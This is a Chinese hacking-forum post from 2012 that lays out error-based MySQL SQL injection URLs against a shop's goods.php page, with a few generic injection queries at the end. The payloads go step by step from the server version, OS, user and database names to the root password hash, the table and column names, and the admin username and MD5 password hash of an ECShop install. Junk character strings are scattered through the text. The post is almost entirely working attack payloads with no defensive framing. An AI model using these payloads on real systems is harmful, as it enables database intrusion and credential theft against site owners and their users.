找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1984|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
判断版本号
& |6 T; Y, u/ _8 E3 x3 M. A& Hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ \& a5 q: N# N1 ^

; p' p- O3 J, @3 V$ i+ K" |3 N判断系统: t1 h; ^" t6 p/ O8 \5 k# O

/ ~1 \* O. i$ Z( zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' l# {1 e+ |5 V$ i' h
) b2 I& Q# M7 p
! K3 {0 Z9 |  n0 H

# |2 }+ q4 x; M$ }7 E当前 user()
1 @' C2 O, ^! w' U# R* K! d
& J$ p+ \: F2 m  ^' d- ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  @, F" r' E2 t' N; v" k1 o" h/ N4 v  u5 s! a% w( d

5 W. p( k; s2 u6 e
5 Y2 o+ |" `6 U+ \0 ]) `当前 database()
0 q; r) P' F# X8 F6 R/ U, s$ Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 ?" {& A  k9 [0 ^9 b4 c* j+ r
. t! {9 U  h: i' Y& j3 i3 N3 ]) D- d( t/ Q' q

' [; l- j' L; m$ @. [/ X( m) D
3 I1 e9 l' a4 z. q/ I2 croot hash- O$ n" l4 P% k; [
: o3 K$ u$ H- K: ?
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" P. |3 x# F' g+ l( ?6 Z1 T; G2 a( L' n3 z( [6 `

) A4 h- {9 D( \" k2 A7 |2 O4 A% E
6 X6 e; ^6 ^9 j$ E5 A  t; A当前 数据库表名- j7 R$ {5 A, B+ w
7 m: |1 P' h* D
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 g3 X( l' O% B4 t9 [

4 s0 ]2 M' _! M: m7 x/ N5 P4 H7 [8 C. Y' u: }& m" y' T$ N
. Q- o0 t# e" j8 q" U5 [
当前 数据库 user_name 字段7 Z/ ^2 ], ^6 F2 D4 |7 L

! X/ _7 Y- G3 V0 L9 u  Ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 o, x4 i8 E! O1 ~8 I& c7 G- K8 b7 Z# `* v4 E
当前 数据库 字段 password
2 h% |( U7 r, Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& B3 N  H4 g6 `5 r

* A' Q: g: M; @; F: g8 s: I# f- C8 n9 V# l, V, a( L3 F4 v$ ?
9 \! I) b+ u: B4 g9 c
获得 admin passwd(md5)
9 W! l! a0 N0 s7 `' g5 V
6 D* q8 |8 D" S; v" ?, T3 \/ Y* i! m( ^  P
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. O8 n, k2 y7 M! c+ t' e* u& u* F5 [& o/ X# z# c
报错注射% G2 }- |9 @( [4 q9 Y  J3 l: y
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ p7 J$ K  g! d- R8 R

6 u% J, q- V$ \4 uSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
/ S/ y) V) [5 z" f: U; D
( E. a4 p, u% m8 band(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表